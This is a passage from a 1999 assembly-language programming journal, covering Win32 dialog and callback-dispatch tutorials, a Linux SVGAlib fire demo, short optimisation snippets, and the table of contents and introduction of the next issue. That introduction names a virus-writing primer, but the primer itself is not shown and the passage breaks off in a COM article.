IDC_EDIT            equ 3000
IDC_BUTTON     equ 3001
IDC_EXIT            equ 3002
IDM_GETTEXT  equ 32000
IDM_CLEAR       equ 32001
IDM_EXIT           equ 32002


.code
start:
     invoke GetModuleHandle, NULL
     mov    hInstance,eax
     invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL

     invoke ExitProcess,eax

DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
     .IF uMsg==WM_INITDIALOG
         invoke GetDlgItem, hWnd,IDC_EDIT
         invoke SetFocus,eax
     .ELSEIF uMsg==WM_CLOSE
         invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
     .ELSEIF uMsg==WM_COMMAND
         mov eax,wParam
         .IF lParam==0
             .IF ax==IDM_GETTEXT
                 invoke GetDlgItemText,hWnd,IDC_EDIT,ADDR buffer,512
                 invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
             .ELSEIF ax==IDM_CLEAR
                 invoke SetDlgItemText,hWnd,IDC_EDIT,NULL
             .ELSEIF ax==IDM_EXIT
                 invoke EndDialog, hWnd,NULL
             .ENDIF
         .ELSE
             mov edx,wParam
             shr edx,16
             .if dx==BN_CLICKED
                 .IF ax==IDC_BUTTON
                     invoke SetDlgItemText,hWnd,IDC_EDIT,ADDR TestString
                 .ELSEIF ax==IDC_EXIT
                     invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
                 .ENDIF
             .ENDIF
         .ENDIF
     .ELSE
         mov eax,FALSE
         ret
     .ENDIF
     mov eax,TRUE
     ret
DlgProc endp
end start
   ------------------------------------------------------------------------
                              dialog.rc (part 2)
   ------------------------------------------------------------------------

#include "resource.h"

#define IDC_EDIT        3000
#define IDC_BUTTON      3001
#define IDC_EXIT        3002

#define IDR_MENU1       3003

#define IDM_GETTEXT     32000
#define IDM_CLEAR       32001
#define IDM_EXIT        32002


MyDialog DIALOG 10, 10, 205, 60
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
CAPTION "Our Second Dialog Box"
MENU IDR_MENU1
BEGIN
     EDITTEXT         IDC_EDIT,   15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
     DEFPUSHBUTTON   "Say Hello", IDC_BUTTON,    141,10,52,13
     PUSHBUTTON      "E&xit", IDC_EXIT,  141,26,52,13
END


IDR_MENU1  MENU
BEGIN
     POPUP "Test Controls"
     BEGIN
         MENUITEM "Get Text", IDM_GETTEXT
         MENUITEM "Clear Text", IDM_CLEAR
         MENUITEM SEPARATOR
         MENUITEM "E&xit", IDM_EXIT
     END
END

   ------------------------------------------------------------------------

The analysis follows:

     DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD

We declare the function prototype for DlgProc so we can refer to it with
addr operator in the line below:

     invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL

The above line calls DialogBoxParam function which takes 5 parameters: the
instance handle, the name of the dialog box template, the parent window
handle, the address of the dialog box procedure, and the dialog-specific
data. DialogBoxParam creates a modal dialog box. It will not return until
the dialog box is destroyed.

     .IF uMsg==WM_INITDIALOG
         invoke GetDlgItem, hWnd,IDC_EDIT
         invoke SetFocus,eax
     .ELSEIF uMsg==WM_CLOSE
         invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0

The dialog box procedure looks like a window procedure except that it
doesn't receive the WM_CREATE message. The first message it receives is
WM_INITDIALOG. Normally you can put the initialization code here. Note that
you must return the value TRUE in eax if you process the message. For
WM_INITDIALOG the return value has an extra meaning: TRUE tells Windows to
set the focus to the default control passed in wParam, while FALSE keeps a
focus you have set yourself. Here the default control is the same edit
control, since it is the first control in the template.

The internal dialog box manager doesn't send our dialog box procedure the
WM_DESTROY message by default when WM_CLOSE is sent to our dialog box. So
if we want to react when the user presses the close button on our dialog
box, we must process the WM_CLOSE message. In our example, we send a
WM_COMMAND message with the value IDM_EXIT in wParam. This has the same
effect as when the user selects the Exit menu item. EndDialog is called in
response to IDM_EXIT.

The processing of WM_COMMAND messages remains the same.

When you want to destroy the dialog box, the only way is to call the
EndDialog function. Do not try DestroyWindow! EndDialog doesn't destroy the
dialog box immediately. It only sets a flag for the internal dialog box
manager and continues to execute the next instructions.
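
Both procedures in this tutorial decode WM_COMMAND the same way: the low
word of wParam is the menu or control ID and the high word is the
notification code, and the examples treat lParam == 0 as a menu selection.
A minimal C sketch of that split follows. The helper names are made up for
illustration; Windows headers provide LOWORD and HIWORD macros for the same
job.

```c
#include <stdint.h>

/* Split the 32-bit wParam of WM_COMMAND the way the assembly does with
   "mov eax,wParam" (ID in ax) and "shr edx,16" (notification code in dx). */
uint16_t command_id(uint32_t wparam)   { return (uint16_t)(wparam & 0xFFFFu); }
uint16_t command_code(uint32_t wparam) { return (uint16_t)(wparam >> 16); }
```

For a click on the "Say Hello" button, wParam carries IDC_BUTTON (3001) in
the low word and BN_CLICKED (0) in the high word.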

Now let's examine the resource file. The notable change is that instead of
using a text string as menu name we use a value, IDR_MENU1. This is
necessary if you want to attach a menu to a dialog box created with
DialogBoxParam. Note that in the dialog box template, you have to add the
keyword MENU followed by the menu resource ID.

A difference between the two examples in this tutorial that you can readily
observe is the lack of an icon in the latter example. However, you can set
the icon by sending the message WM_SETICON to the dialog box during
WM_INITDIALOG.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                         Standardizing Win32 Callback Procedures
                                         by Jeremy Gordon


This short article describes my preferred method for coding CALLBACK procedures
in a large assembler program for Windows 32.  First I describe what Win32
callback procedures are, and then get down to some code.

At run time the Win32 system will call your program on a regular and frequent
basis.  The procedures you supply for the system to call are called CALLBACK
procedures.  Here are examples of when these are used:-
1. To manage a window you created.  In this case the system will send many
    messages to the Window Procedure for the window.  The Window Procedure is
    the code label you provide when you register your window class (by calling
    RegisterClass).  For example the message WM_SIZE is sent by the system
    when the window is resized.
2. To inform the owner of a child window of events in the child window.  For
    example WM_PARENTNOTIFY (with a notify code) is sent to the Window
    Procedure of the owner of a window when the child window is being created
    or destroyed, or if the user clicks a mouse button while the cursor is
    over the child window.
3. To inform the owner of a common control of events in the control.  For
    example if you create a button owned by your window the Window Procedure
    for that window receives a WM_COMMAND message carrying the BN_CLICKED
    notification code if the button is clicked.
4. Messages sent to a dialog you have created.  These are messages relating
    to the creation of the dialog and of the various controls.  The dialog
    procedure is informed of events in the controls.
5. If you "Superclass" or "Subclass" a common control, you receive messages
    for that common control like a hook procedure but your window procedure
    has the responsibility of passing them on to the control.
6. If you create "Hook" procedures you can intercept messages about to be sent
    to other windows.  The system will call your hook procedure and will pass
    the message on only when your hook procedure returns.
7. You can ask the system to provide your program with information to be sent
    to a CALLBACK procedure.  Examples are EnumWindows (enumerate all top-level
    windows) or EnumFonts (enumerate all available fonts).

In cases 1 to 5 above, just before the system calls the CALLBACK procedure,
it PUSHES 4 dwords on the stack (ie. 4 "parameters").  Traditionally the
names given to these parameters are:-
        hWnd = handle of window being called
        uMsg = message number
        wParam = a parameter sent with the message
        lParam = another parameter sent with the message.

The number of parameters sent to hook procedures and enumeration
callbacks varies - see the Windows SDK.

Since your Window (or Dialog) procedure will need to react in a certain
way depending on the message being sent, your code will need to divert
execution to the correct place for a particular message.

"C" programmers have the advantage of being able to code this simply,
using "switch" and "case".
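
For comparison, a minimal C sketch of such a switch is shown here. The
function name and the 1/0 return convention are assumptions made for
illustration; the three message numbers are the ones used in the compare
chain that follows.

```c
/* Message numbers, copied so no Windows header is needed. */
enum { WM_CREATE = 0x0001, WM_WINDOWPOSCHANGED = 0x0047, WM_INITMENU = 0x0116 };

/* Hypothetical dispatcher: returns 1 if the message is handled here and
   0 if it should be left to default processing. */
int handle_message(unsigned msg)
{
    switch (msg) {
    case WM_CREATE:           return 1;
    case WM_INITMENU:         return 1;
    case WM_WINDOWPOSCHANGED: return 1;
    default:                  return 0;
    }
}
```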

Assembler programmers use various techniques.  Perhaps the worst if there are
a lot of messages to handle is the chain of compares, eg. (in A386 format):-
        MOV EAX,[EBP+0Ch]        ;get message number
        CMP EAX,1h               ;see if WM_CREATE
        JNZ >L2                  ;no
        XOR EAX,EAX              ;ensure eax is zero on exit
        JMP >L32                 ;finish
        L2:
        CMP EAX,116h             ;see if WM_INITMENU
        JNZ >L4                  ;no
        CALL INITIALISE_MENU
        JMP >L30                 ;correct exit code
        L4:
        CMP EAX,47h              ;see if WM_WINDOWPOSCHANGED
        JNZ >L8
        and so on ........

To avoid these long chains, assembler programmers have developed various
techniques.  You will have seen many of these in sample code around Win32
assembler web sites and in the asm journal, using conditional jumps, macros
or table scans.  I do not wish to compare these various methods, merely to put
forward my own current favourite, which I believe has these advantages:-
1. It works on all assemblers
2. It is modular, ie. the code for each window can be concentrated in a
    particular part of your source code
3. It is easy to follow from the source code what message causes what result
4. The same function can easily be called from within different window
    procedures

My method results in a very simple Window Procedure as follows (A386 format):-

        WndProc:
        MOV EDX,OFFSET MAINMESSAGES
        CALL GENERAL_WNDPROC
        RET 10h

where the messages and functions (specific to this particular window
procedure) are set out in a table such as this:-

;----------------------------------------------------------
DATA SEGMENT FLAT             ;assembler to put following in data section
;--------------------------- WNDPROC message functions
MAINMESSAGES DD ENDOF_MAINMESSAGES-$                ;=table size in bytes
        DD  312h,HOTKEY,116h,INITMENU,117h,INITMENUPOPUP,11Fh,MENUSELECT
        DD  1h,CREATE,2h,DESTROY, 410h,OWN410,411h,OWN411
        DD  231h,ENTERSIZEMOVE,47h,WINDOWPOSCHANGED,24h,GETMINMAXINFO
        DD  1Ah,SETTINGCHANGE,214h,SIZING,46h,WINDOWPOSCHANGING
        DD  2Bh,DRAWITEM,0Fh,PAINT,113h,TIMER,111h,COMMAND
        DD  104h,SYSKEYDOWN,100h,KEYDOWN,112h,SYSCOMMAND
        DD  201h,LBUTTONDOWN,202h,LBUTTONUP,115h,SCROLLMESS
        DD  204h,RBUTTONDOWNUP,205h,RBUTTONDOWNUP
        DD  200h,MOUSEMOVE,0A0h,NCMOUSEMOVE,20h,SETCURSORM
        DD  4Eh,NOTIFY,210h,PARENTNOTIFY,86h,NCACTIVATE,6h,ACTIVATE
        DD  1Ch,ACTIVATEAPP
ENDOF_MAINMESSAGES:           ;label used to work out how many messages
;----------------------------------------------------------
_TEXT SEGMENT FLAT            ;assembler to put following in code section
;----------------------------------------------------------

and where each of the functions here are procedures, for example:-

        CREATE:
        XOR EAX,EAX             ;ensure zero and nc return
        RET

and where GENERAL_WNDPROC is as follows:-

        GENERAL_WNDPROC:
        PUSH EBP
        MOV EBP,[ESP+10h]       ;get uMsg in ebp
        MOV ECX,[EDX]           ;get number of messages to do * 8 (+4)
        SHR ECX,3               ;get number of messages to do
        ADD EDX,4               ;jump over size dword
        L33:
        DEC ECX
        JS >L46                 ;s=message not found
        CMP [EDX+ECX*8],EBP     ;see if it's the correct message
        JNZ L33                 ;no
        MOV EBP,ESP
        PUSH ESP,EBX,EDI,ESI    ;save registers as required by Windows
        ADD EBP,4               ;allow for the extra call to here
        ;now [EBP+8]=hWnd,[EBP+0Ch]=uMsg,[EBP+10h]=wParam,[EBP+14h]=lParam
        CALL [EDX+ECX*8+4]      ;call correct procedure for the message
        POP ESI,EDI,EBX,ESP
        JNC >L48                ;nc=don't call DefWindowProc eax=exit code
        L46:
        PUSH [ESP+18h],[ESP+18h],[ESP+18h],[ESP+18h]  ;ESP changes on push
        CALL DefWindowProcA
        L48:
        POP EBP
        RET
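
For readers who find the control flow easier to follow in a high-level
language, here is a rough C model of the same table scan. It is a sketch,
not a translation: the carry flag is modelled by the handler's return value
(nonzero = "c", call the default procedure), default_proc is a hypothetical
stand-in for DefWindowProc, and all names are invented for illustration.

```c
#include <stddef.h>

/* A handler stores its exit code in *result and returns 0 ("nc"), or
   returns nonzero ("c") to ask for default processing. */
typedef int (*msg_handler)(unsigned wparam, long lparam, long *result);

struct msg_entry { unsigned msg; msg_handler fn; };

/* Hypothetical stand-in for DefWindowProc; -1 just marks "default ran". */
long default_proc(unsigned msg, unsigned wparam, long lparam)
{
    (void)msg; (void)wparam; (void)lparam;
    return -1;
}

long general_wndproc(const struct msg_entry *table, size_t count,
                     unsigned msg, unsigned wparam, long lparam)
{
    /* Scan from the last entry down to the first, like DEC ECX / JS. */
    for (size_t i = count; i-- > 0; ) {
        if (table[i].msg == msg) {
            long result = 0;
            if (!table[i].fn(wparam, lparam, &result))
                return result;      /* "nc": handled, return exit code */
            break;                  /* "c": go on to default processing */
        }
    }
    return default_proc(msg, wparam, lparam);
}

/* Two example handlers and a two-row table. */
int on_create(unsigned w, long l, long *r) { (void)w; (void)l; *r = 0; return 0; }
int on_paint(unsigned w, long l, long *r)  { (void)w; (void)l; (void)r; return 1; }

const struct msg_entry main_messages[] = {
    { 0x0001, on_create },  /* WM_CREATE: handled, exit code 0 */
    { 0x000F, on_paint  },  /* WM_PAINT: deferred to default processing */
};
```

A window procedure then reduces to one call such as
general_wndproc(main_messages, 2, msg, wparam, lparam), which is the role
played by the three-instruction WndProc shown earlier.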


NOTES:
-------------------------------------------------------------------------------
1. Instead of giving the actual message value, you can, of course, give
    the name of an EQUATE.  For example
            WM_CREATE EQU 1h
    enables you to use WM_CREATE,CREATE instead of 1h,CREATE if you wish.
2. It is tempting to keep the message table in the CODE SECTION.  This is
    perfectly possible because the only difference to the Win32 system between
    the code section and the data section is that the code section area of
    memory is marked read only, whereas the data section is read/write.
    However, you may well get some loss of performance if you do this because
    most processors will read data more quickly from the data section.
    I performed some tests on this and found that having the table in the code
    section rather than the data section could slow the code considerably:-
          486 processor - 22% to 36% slower
          Pentium processor - 94% to 161% slower
          AMD-K6-3D processor - 78% to 193% slower
          (but Pentium Pro - from 7% faster to 9% slower)
          (and Pentium II - from 29% faster to 5% slower)
    These tests were carried out on a table of 60 messages and the range of
    results is because tests were carried out varying the number of scans
    required before a find and also testing a no-find.
3. The procedure names must not be the names of API imports to avoid
    confusion!  For example change SETCURSOR slightly to avoid confusion
    with the API SetCursor.
4. If a function returns c (carry flag set) the window procedure will call
    DefWindowProc.  An nc return (carry flag not set) will merely return to
    the system with the return code in eax.  (Some messages must be dealt with
    in this way).
5. You can send a parameter of your own to GENERAL_WNDPROC using EAX.
    This is useful if you wish to identify a particular window.
    For example:-
        SpecialWndProc:
        MOV EAX,OFFSET hSpecialWnd
        MOV EDX,OFFSET SPECIALWND_MESSAGES
        CALL GENERAL_WNDPROC
        RET 10h
6. The ADD EBP,4 just before the call to the function is to ensure that
    EBP points to the parameters on the stack in the same way as if the window
    procedure had been entered normally.  This is intended to ensure that
    the function will be compatible if called by an ordinary window procedure
    written in assembler, for example:-
        WndProc:
        PUSH EBP
        MOV EBP,ESP
        ;now [EBP+8]=hWnd,[EBP+0Ch]=uMsg,[EBP+10h]=wParam,[EBP+14h]=lParam
7. A standardized procedure for dealing with messages to a dialog procedure
    can also be created in the same way, except that it should return TRUE
    (eax=1) if the message is processed and FALSE (eax=0) if it is not, without
    calling DefWindowProc. The same coding method can be applied to hooks and
    to enumerator CALLBACKS although these will vary.

                              jorgon@...
                 http://ourworld.compuserve.com/homepages/jorgon



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                               Fire Demo ported to Linux SVGAlib
                                               by Jan Wagemakers


  In APJ4 there was a nice little fire demo written in DOS assembly language.
  I have ported this program to Linux assembly language. It is written in
  AT&T syntax (GNU assembler) and makes use of SVGAlib.

  My main goal of porting this program to Linux was to show that it can be
  done. So, I have not optimized this program. For example, things like 'call
  ioperm' can also be done by making use of int 0x80; quite possibly making use
  of int 0x80 will make the program smaller. More information about int 0x80 is
  available at Konstantin Boldyshev's webpage [http://lightning.voshod.com/asm].

  With SVGALib you can access the screen memory directly, just like you
  would write to A000:0000 in a DOS asm-program.

  I would like to thank 'paranoya' for his explanation of how to make use of
  SVGAlib. Anyway, enough blablabla, here is the source ;-)

# fire.s : fire.asm of apj 4 ported to Linux/SVGAlib ==========================
# gcc -o fire fire.s -lvga
  .globl main
         .type    main,@function
main:
         pushl %ebp
         movl %esp,%ebp

         call vga_init           # Init vga
         pushl $5
         call vga_setmode        # set mode to 5 = 320x200x256
         addl $4,%esp
         pushl $0
         call vga_setpage        # Point to page 0 (There is only 1 page)
         addl $4,%esp

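         pushl $1                # Turn On value (last argument, pushed first)
         pushl $2                # Number of ports: 3c8h to 3c9h
         pushl $0x3c8            # Get IOpermission, starting from 3c8h
         call ioperm             # ioperm(from, num, turn_on)
         addl $12,%esp

         pushl $1                # Turn On value
         pushl $1                # Number of ports: just 60h
         pushl $0x60             # Get IOpermission, for 60h : keyboard
         call ioperm
         addl $12,%esp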

         inb $0x60,%al           # Read current value of keyboard
         movb %al,key

         movw $0x3c8,%dx
         movw $0,%ax
         outb %al,%dx
         incw %dx
lus:
         outb %al,%dx
         outb %al,%dx
         outb %al,%dx
         incw %ax
         jnz lus

         movl graph_mem,%ebx

Mainloop:
         movl $1280,%esi         # mov si,1280 ;
         movl $0x5d00,%ecx       # mov ch,5dh  ; y-pos, the less the faster demo
         pushl %esi              # push    si
         pushl %ecx              # push    cx
Sloop:
         movb (%ebx,%esi),%al    # lodsb
         incl %esi               #


         addb (%ebx,%esi),%al    # al,[si]                 ; pick color and
         addb 320(%ebx,%esi),%al # add     al,[si+320]     ; pick one more and
         shrb $2,%al             # shr     al,2

         movb %al,-960(%ebx,%esi) # mov     [si-960],al     ; put color

         loop Sloop

         popl %edi               # pop di
         popl %ecx               # pop cx

Randoml:
         mulw 1(%ebx,%edi)       # mul     word ptr [di+1] ; 'random' routine.
         incw %ax
         movw %ax,(%ebx,%edi)    #stosw
         incl %edi
         incl %edi
         loop Randoml

         inb $0x60,%al
         cmpb key,%al
         jz Mainloop

         pushl $0
         call exit
         addl $4,%esp

         movl %ebp,%esp
         popl %ebp
         ret

.data
key:
         .byte   0
# =============================================================================
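
For readers who find the AT&T listing hard to follow, here is a rough C model
of what the Sloop part does on each pass. The function name fire_blur and its
parameters are made up for this sketch (they do not appear in fire.s), and the
buffer merely stands in for graph_mem. Treat it as an illustration under those
assumptions, not as a replacement for the listing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical C model of the Sloop loop in fire.s.
 * buf   : stands in for graph_mem (320 bytes per screen line)
 * start : initial value of %esi (1280 in the listing)
 * count : initial value of %ecx (0x5d00 in the listing)
 * The caller must make sure buf holds at least start + count + 321 bytes. */
void fire_blur(uint8_t *buf, size_t start, size_t count)
{
    size_t si = start;

    assert(start >= 959);                    /* si - 960 must stay >= 0     */
    while (count-- > 0) {
        uint8_t al = buf[si];                /* lodsb: load a pixel ...     */
        si++;                                /* ... and advance             */
        al = (uint8_t)(al + buf[si]);        /* add the next pixel          */
        al = (uint8_t)(al + buf[si + 320]);  /* add the pixel one line down */
        al >>= 2;                            /* shr al,2                    */
        buf[si - 960] = al;                  /* store three lines higher    */
    }
}
```

The sums wrap at 8 bits, just as the byte-sized addb instructions do, which is
part of what gives the flames their flicker.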



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
							        Abs
							        by Chris Dragan

;Summary:       Calculates absolute value of a signed integer in eax.
;Compatibility: 386+
;Notes:  9 bytes, 4 clocks (P5), destroys ecx
	 mov ecx, eax ; Duplicate value
	 sar ecx, 31  ; Fill ecx with its sign (0 or -1)
	 xor eax, ecx ; Do 'not eax' if negative
	 sub eax, ecx ; Do 'inc eax' if negative

; For comparison, the standard way (2-8 clocks on P5 and 1-17 on P6):
;        or      eax, eax
;        jns     @@1
;        neg     eax
;@@1:
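
; The same trick can be modelled in C to check it by hand. This is only a
; sketch: the name abs_branchless is invented here, and the code works on the
; raw 32-bit pattern so that it does not depend on how a compiler shifts
; negative numbers.

```c
#include <stdint.h>

/* C model of: mov ecx,eax / sar ecx,31 / xor eax,ecx / sub eax,ecx */
uint32_t abs_branchless(int32_t value)
{
    uint32_t eax = (uint32_t)value;
    uint32_t ecx = (uint32_t)0 - (eax >> 31); /* 0xFFFFFFFF if negative, else 0 */

    eax ^= ecx;   /* 'not eax' if negative                  */
    eax -= ecx;   /* 'inc eax' if negative (subtracting -1) */
    return eax;
}
```

; As with the assembly version, the most negative value (80000000h) comes back
; unchanged, since its absolute value does not fit in a signed dword.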

							        Min
							        by Chris Dragan

;Summary:       eax = min (eax, ecx) (both eax and ecx unsigned)
;Compatibility: 386+
;Notes:  8 bytes, 4 clocks (P5), destroys ecx and edx
	 sub ecx, eax ; ecx = n2 - n1
	 sbb edx, edx ; edx = (n1 > n2) ? -1 : 0
	 and ecx, edx ; ecx = (n1 > n2) ? (n2 - n1) : 0
	 add eax, ecx ; eax += (n1 > n2) ? (n2 - n1) : 0
; Standard cmp/jbe/mov takes 2-8 clocks on P5 and 1-17 on P6

							        Max
							        by Chris Dragan

;Summary:       eax = max (eax, ecx) (both eax and ecx unsigned)
;Compatibility: 386+
;Notes:  9 bytes, 5 clocks (P5), destroys ecx and edx
	 sub ecx, eax ; ecx = n2 - n1
	 cmc 	 ; cf = n1 <= n2
	 sbb edx, edx ; edx = (n1 > n2) ? 0 : -1
	 and ecx, edx ; ecx = (n1 > n2) ? 0 : (n2 - n1)
	 add eax, ecx ; eax += (n1 > n2) ? 0 : (n2 - n1)
; Standard cmp/jae/mov takes 2-8 clocks on P5 and 1-17 on P6
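
; Both snippets rely on sbb turning the carry flag into an all-ones or
; all-zeros mask. A C model, with the carry kept in an ordinary variable, may
; make that easier to see. The function names are invented for this sketch.

```c
#include <stdint.h>

/* C model of Min: sub ecx,eax / sbb edx,edx / and ecx,edx / add eax,ecx */
uint32_t min_branchless(uint32_t eax, uint32_t ecx)
{
    uint32_t carry = (uint32_t)(ecx < eax);  /* carry flag left by sub ecx,eax */
    uint32_t edx;

    ecx -= eax;                              /* ecx = n2 - n1 (may wrap)       */
    edx = (uint32_t)0 - carry;               /* sbb edx,edx: -1 or 0           */
    return eax + (ecx & edx);                /* add the difference or nothing  */
}

/* C model of Max: the same, with cmc inverting the carry first */
uint32_t max_branchless(uint32_t eax, uint32_t ecx)
{
    uint32_t carry = (uint32_t)(ecx < eax);
    uint32_t edx;

    ecx -= eax;
    carry ^= 1u;                             /* cmc                            */
    edx = (uint32_t)0 - carry;
    return eax + (ecx & edx);
}
```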

                                                                     OBJECT
                                                                     by mammon_
;Summary:       Primitive for defining dynamic objects
;Compatibility: NASM
;Notes:         The basic building block for classes in NASM; part of
;               an ongoing project of mine. Note that .this can be
;               filled with the instance pointer, and additional
;               routines such as .%1 [constructor] and .~  can be added.
         %macro OBJECT 1
                 struc %1
                  .this:       resd 1
         %endmacro
         %macro END_OBJECT 0
                 endstruc
         %endmacro

     ;_Sample:________________________________________________________________
     ;OBJECT MSGBOX
     ;  .hWnd:        resd 1
     ;  .lpText:      resd 1
     ;  .lpCapt:      resd 1
     ;  .uInt:        resd 1
     ;  .show:        resd 1
     ;END_OBJECT
     ;;MyMbox is a pointer to a location in memory or in an istruc; its members
     ;;are filled in an init routine ['new'] with "show" being "DD _show"
     ;_show:             ;MSGBOX class display routine
     ;        push dword [MyMbox + MSGBOX.uInt]
     ;        push dword [MyMbox + MSGBOX.lpCapt]
     ;        push dword [MyMbox + MSGBOX.lpText]
     ;        push dword [MyMbox + MSGBOX.hWnd]
     ;        call MessageBoxA
     ;        ret
     ;..start:
     ;        call [MyMbox + MSGBOX.show]
     ;        ret



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                                 Binary-to-ASCII
                                                                by Jan Verhoeven


The Challenge
-------------
Write a routine to convert the value of a bit to ASCII in under 10 bytes, with
no conditional jumps.

The Solution
------------
Load the number into the AX register and shift through the bits. If a bit is
cleared [0], you want to print a "0" character; if a bit is set [1], you want
to print a "1".

Prime the BL register with the ASCII character "0"; if the next bit in AX is
set, carry will be set after the SHL and BL will thus be incremented to an
ASCII "1". The key, as you will see, is the ADC [AddWithCarry] instruction:

L0: B330          MOV     BL,30   ; start with BL = ASCII ZERO
     D1E0          SHL     AX,1    ; ... but if bit = set, ...
     80D300        ADC     BL,00   ; ... make it a ONE.

7 bytes all told; with a loop and mov instruction for storing each value in
BL to the location of your choice, you will have a full-fledged binary-to-
ascii converter in a handful of bytes.
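
The full converter described above might look like this when modelled in C.
This is a sketch only: the function name and the 17-byte output buffer are
assumptions made for the example, and the carry flag is stood in for by an
ordinary variable.

```c
#include <stdint.h>

/* Writes the 16 bits of value, most significant first, as '0'/'1'
 * characters into out, followed by a terminating NUL.
 * out must have room for 17 bytes. */
void u16_to_binary(uint16_t value, char out[17])
{
    int i;

    for (i = 0; i < 16; i++) {
        unsigned carry = (value >> 15) & 1u;  /* bit SHL AX,1 moves into carry */
        value = (uint16_t)(value << 1);       /* SHL AX,1                      */
        out[i] = (char)('0' + carry);         /* MOV BL,30 then ADC BL,00      */
    }
    out[16] = '\0';
}
```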




::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#12 From: "Michael Mondragon" <mammon_@...>
Date: Fri Sep 17, 1999 1:14 am
Subject: APJ Issue#4 Apr-June 99
 
______________________________________________________
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                               Apr-June  99
:::\_____\::::::::::.                                              Issue      4
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Using COM in Assembly Language"..........................Lord.Lucifer

"Stack Frames and High-Level Calls"............................mammon_

"Define Your Memory".......................................Alan Baylis

"Writing a Boot Sector in A86"...........................Jan Verhoeven

"A Basic Virus Writing Primer"...................................Chili

Column: Win32 Assembly Programming
     "Mouse Input....".........................................Iczelion
     "Menus"...................................................Iczelion

Column: The C standard library in Assembly
     "C string functions:_strtok"................................Xbios2

Column: The Unix World
     "Using Menus in Xt"........................................mammon_

Column: Assembly Language Snippets
     "Triple XOR".........................................Jan Verhoeven
     "Trailing Calls".....................................Jan Verhoeven

Column: Issue Solution
     "Fire Demo"....................................................iCE
----------------------------------------------------------------------
        +++++++++++++++++++++Issue  Challenge+++++++++++++++++++
        Write a "Fire Demo"-style program in less than 100 bytes
----------------------------------------------------------------------


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by mammon_


In the last few months I have come across a number of links to APJ, and have
received the proverbial ton of email regarding it. Strangely enough, the
majority of these tend to agree that the one problem with the journal is its
infrequent --if not irregular-- publication. If that is the only complaint so
far, I think I can cope with it ;)

This issue is, naturally, very late due to what could be called "real world"
[lit., "that which does not go away when a power outage kills your PC"]
considerations; however the articles by weight alone should make up for some
of this.

The largest of the bunch is undoubtedly the virus writing tutorial by Chili,
who may have beaten my previous record for article length: a very thorough work,
worth reading just to help protect against viruses, if not to write them. This
is accompanied by Jan's discussion of boot sector programming...a suitable
companion article, I believe.

High-level coders will undoubtedly be interested in Lord Lucifer's article on
COM programming in assembly; it seems that high-level areas such as COM,
DirectDraw, and Winsock coding are starting to receive a fair degree of
attention from the assembly language world, judging from the tutorials I have
been coming across.

Xbios2 has continued his excellent C stdlib work, and Iczelion has contributed
two more of his now-legendary Win32 asm tutorials; I of course have kept up
the Unix vanguard with yet another Xt article.

This month's challenge was contributed by iCE, and had a .text-size I could
not readily beat.

A few brief notes concerning the web page: I have thrown together a basic
collection of assembly language links at
         http://asmjournal.freeservers.com/lynx.html
Submissions for this links page are welcome. I have also been getting a few
emails to the APJ inbox asking or offering help with assembly language; since
I check the inbox fortnightly at best, I have added a "classified ads" page to
the APJ website at
         http://www.guestbook4free.com/en/28806/entries/
which is essentially a guestbook where people can post contact info, projects
they need help with, etc ... more or less a one-way bulletin board like, well,
like classified ads are.

That should just about wrap things up. Enjoy the issue!

_m


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                  Using COM in Assembly Language
						  by Lord Lucifer


This article will discuss how to use COM interfaces in your assembly language
programs.  It will not discuss what COM is and how it is used, but rather how
it can be used when programming in assembler.  It will discuss only how to
use existing interfaces, and not how to actually implement new ones; this will
be shown in a future article.


About COM
------------------------------------------------------------------------------

Here is a brief introduction to the basics behind COM.

A COM object is one in which access to an object's data is achieved
exclusively through one or more sets of related functions. These function
sets are called interfaces, and the functions of an interface are called
methods. COM requires that the only way to gain access to the methods of an
interface is through a pointer to the interface.

An interface is actually a contract that consists of a group of related
function prototypes whose usage is defined but whose implementation
is not. An interface definition specifies the interface's member functions,
called methods, their return types, the number and types of their parameters,
and what they must do. There is no implementation associated with an
interface. An interface implementation is the code a programmer supplies to
carry out the actions specified in an interface definition.

An instance of an interface implementation is actually a pointer to an array
of pointers to methods (a function table that refers to an implementation of
all of the methods specified in the interface). Any code that has a pointer
through which it can access the array can call the methods in that interface.



Using a COM object in assembly language
-------------------------------------------------------------------------------

Access to a COM object occurs through a pointer.  The first DWORD of the object
this pointer refers to holds the address of a table of function pointers, called
